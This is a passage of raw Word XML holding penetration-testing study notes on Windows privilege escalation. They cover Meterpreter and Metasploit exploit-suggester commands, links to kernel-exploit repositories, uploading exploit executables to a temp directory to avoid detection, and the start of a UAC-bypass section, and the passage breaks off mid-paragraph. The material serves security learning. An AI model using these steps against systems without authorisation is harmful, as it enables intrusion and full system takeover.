    <w:p w14:paraId="2CCE6A4C" w14:textId="52DCDFA9" w:rsidR="00B1380B" w:rsidRDefault="008C78A9" w:rsidP="008C78A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Identifying kernel vulnerabilities for the specific version of Windows you are attempting to escalate your privileges within.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E9E865" w14:textId="547F761D" w:rsidR="008C78A9" w:rsidRDefault="008C78A9" w:rsidP="008C78A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Download, compiling, and transferring kernel exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE0DA11" w14:textId="782A17C4" w:rsidR="008C78A9" w:rsidRDefault="008C78A9" w:rsidP="008C78A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344D58D9" w14:textId="5B4B1760" w:rsidR="008C78A9" w:rsidRDefault="008C78A9" w:rsidP="008C78A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“getprivs” “getsystem”</w:t>
      </w:r>
      <w:r w:rsidR="00584BB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> “shell” “systeminfo”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF38631" w14:textId="25D42372" w:rsidR="008C78A9" w:rsidRDefault="008C78A9" w:rsidP="008C78A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“post/multi/recon/local_exploit_suggester”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547DC14B" w14:textId="320312DF" w:rsidR="008C78A9" w:rsidRDefault="008C78A9" w:rsidP="008C78A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Need to specify session as this is a post exploit module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9C34CE" w14:textId="035E4ADB" w:rsidR="008C78A9" w:rsidRDefault="008C78A9" w:rsidP="008C78A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Will enumerate </w:t>
      </w:r>
      <w:r w:rsidR="00584BB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the potential vulnerabilities within that version of Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B57DDC" w14:textId="638CABE1" w:rsidR="008C78A9" w:rsidRDefault="008C78A9" w:rsidP="008C78A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Will bounce</w:t>
      </w:r>
      <w:r w:rsidR="00584BB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the vulnerable portions of the Windows machine and help the attacker understand the different exploits that can be utilized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E41E40E" w14:textId="12CBCE04" w:rsidR="00584BB4" w:rsidRDefault="00584BB4" w:rsidP="008C78A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>We can subsequentially use the corresponding Metasploit exploitation modules that the enumeration module bounces back to us.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5381B4F8" w14:textId="687273B5" w:rsidR="00584BB4" w:rsidRDefault="00584BB4" w:rsidP="00584BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Make sure to research into these exploits! (Rapid7, NVD, or Exploit-DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377EC094" w14:textId="77777777" w:rsidR="00584BB4" w:rsidRDefault="00584BB4" w:rsidP="00584BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7401E602" w14:textId="591BEC83" w:rsidR="00584BB4" w:rsidRDefault="00584BB4" w:rsidP="00584BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Github Windows Exploit Suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7359914E" w14:textId="74EAC7CD" w:rsidR="00584BB4" w:rsidRDefault="00420090" w:rsidP="00584BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00584BB4" w:rsidRPr="001B23F1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>http://github.com/AonCyberLabs/Windows-Exploit-Suggester</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50B7BEB3" w14:textId="475DF0D4" w:rsidR="00584BB4" w:rsidRDefault="00584BB4" w:rsidP="00584BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The github repo has the specifics on how to run, it essentially does the same as the Metasploit module shown above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690EC0D3" w14:textId="479F5A74" w:rsidR="00584BB4" w:rsidRDefault="00584BB4" w:rsidP="00584BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Will enumerate the machine to understand what privilege escalation vulnerabilities it is vulnerable to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BC2CEC" w14:textId="60945F7D" w:rsidR="00584BB4" w:rsidRDefault="00584BB4" w:rsidP="00584BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“systeminfo” the suggester will attempt to understand the different hotfixes that have been used on this machine to understand the privilege escalation path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F8B94A" w14:textId="53C648C4" w:rsidR="00584BB4" w:rsidRDefault="00584BB4" w:rsidP="00584BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Copy this output into a separate text file on your attacking machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1C66E8" w14:textId="39545B4C" w:rsidR="00584BB4" w:rsidRDefault="00584BB4" w:rsidP="00584BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“./windows-exploit-suggester.py –update”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A22CEF0" w14:textId="5912565C" w:rsidR="00584BB4" w:rsidRDefault="00584BB4" w:rsidP="00584BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“./windows-exploit-suggester.py –database (LATEST DB) –systeminfo (PATH TO TEXT FILE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7CEF1D" w14:textId="48DA8C01" w:rsidR="00584BB4" w:rsidRDefault="00584BB4" w:rsidP="00584BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The output is relatively easy to understand and will display exploit-db proof of concepts or Metasploit exploit modules based on the output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275AD383" w14:textId="77777777" w:rsidR="00584BB4" w:rsidRDefault="00584BB4" w:rsidP="00584BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E38C2B9" w14:textId="5A7072A2" w:rsidR="00584BB4" w:rsidRDefault="00420090" w:rsidP="00584BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="00584BB4" w:rsidRPr="001B23F1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://github.com/SecWiki/windows-kernel-exploits</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26EA9DE0" w14:textId="77777777" w:rsidR="00584BB4" w:rsidRPr="00584BB4" w:rsidRDefault="00584BB4" w:rsidP="00584BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="136CC59F" w14:textId="64BC9FD3" w:rsidR="00584BB4" w:rsidRDefault="00584BB4" w:rsidP="00584BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Good to utilize once we have enumerated the </w:t>
      </w:r>
      <w:r w:rsidR="000A4A25">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Windows machine with the Exploit suggester, has listed exploits and such.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FACD5C6" w14:textId="181FF484" w:rsidR="000A4A25" w:rsidRDefault="000A4A25" w:rsidP="000A4A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>They do contain prebuilt executables, from which can be downloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D524607" w14:textId="19E910B3" w:rsidR="000A4A25" w:rsidRDefault="000A4A25" w:rsidP="000A4A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Does not consider antivirus detection, which could potentially need to be bypassed to execute these exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7D5CF9" w14:textId="2D998C2A" w:rsidR="000A4A25" w:rsidRDefault="000A4A25" w:rsidP="000A4A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Download the executable onto your attacking machine and create temp directory to inject executable into.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1C713A" w14:textId="23D76D91" w:rsidR="000A4A25" w:rsidRDefault="000A4A25" w:rsidP="000A4A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Do not transfer your files into a user directory, as there’s a high chance you could be detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F5A1C2" w14:textId="377B57CC" w:rsidR="000A4A25" w:rsidRDefault="000A4A25" w:rsidP="000A4A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Utilize the temp directory to upload these files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7119EA68" w14:textId="5F70A810" w:rsidR="000A4A25" w:rsidRDefault="000A4A25" w:rsidP="000A4A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“upload (PATH OF EXECUTABLE)” – to upload exploit executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D96682" w14:textId="46E6CD09" w:rsidR="000A4A25" w:rsidRDefault="000A4A25" w:rsidP="000A4A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Upon gaining everything, utilize “.\(EXECUTABLE)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ECC004" w14:textId="77777777" w:rsidR="000041A0" w:rsidRDefault="000041A0" w:rsidP="000041A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1442F0B0" w14:textId="1B8087FC" w:rsidR="000041A0" w:rsidRDefault="000041A0" w:rsidP="000041A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Remember that kernel exploits can potentially not be safe to use, as exploiting the kernel can cause system crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FD67AC" w14:textId="77777777" w:rsidR="002E06CA" w:rsidRPr="002E06CA" w:rsidRDefault="002E06CA" w:rsidP="002E06CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A038B21" w14:textId="77777777" w:rsidR="002E06CA" w:rsidRDefault="002E06CA" w:rsidP="002E06CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6576BDFE" w14:textId="33EE0BB4" w:rsidR="002E06CA" w:rsidRDefault="002E06CA" w:rsidP="002E06CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bypassing UAC with UACMe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1963C470" w14:textId="21177D60" w:rsidR="002E06CA" w:rsidRDefault="002E06CA" w:rsidP="002E06CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>UAC (User Account Control) – is a Windows security feature that was introduced in Vista that is used to prevent unauthorized changes from being made to the OS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11791425" w14:textId="406542C7" w:rsidR="002E06CA" w:rsidRDefault="007630B6" w:rsidP="002E06CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Used to ensure that changes to the OS require approval from the administrator or a user account that is part of the local administrators group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F15CF5B" w14:textId="795B11F8" w:rsidR="007630B6" w:rsidRDefault="005523EA" w:rsidP="002E06CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Privileged user – consent prompt, Unprivileged user – </w:t>
      </w:r>
      <w:r w:rsidR="00736527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>administrative user/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00736527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B38D10B" w14:textId="4BA846B2" w:rsidR="005523EA" w:rsidRDefault="005523EA" w:rsidP="002E06CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>There are attacks that can bypass UAC to execute malicious executables with elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C838CE2" w14:textId="77777777" w:rsidR="005523EA" w:rsidRDefault="005523EA" w:rsidP="005523EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3388C666" w14:textId="17C3A204" w:rsidR="005523EA" w:rsidRDefault="00A84E9E" w:rsidP="00A84E9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Bypassing UAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60446A51" w14:textId="77777777" w:rsidR="00A84E9E" w:rsidRDefault="00A84E9E" w:rsidP="00A84E9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59EE0021" w14:textId="4C19AEA9" w:rsidR="00A84E9E" w:rsidRDefault="00E61D96" w:rsidP="00A84E9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>To</w:t>
      </w:r>
      <w:r w:rsidR="00A84E9E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> bypass UAC, you will need to have access to a user account that is a part of the local </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>administrator’s</w:t>
      </w:r>
      <w:r w:rsidR="00A84E9E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> group on the Windows target system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F063C6" w14:textId="5EF31DC3" w:rsidR="00E61D96" w:rsidRDefault="00E61D96" w:rsidP="00A84E9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
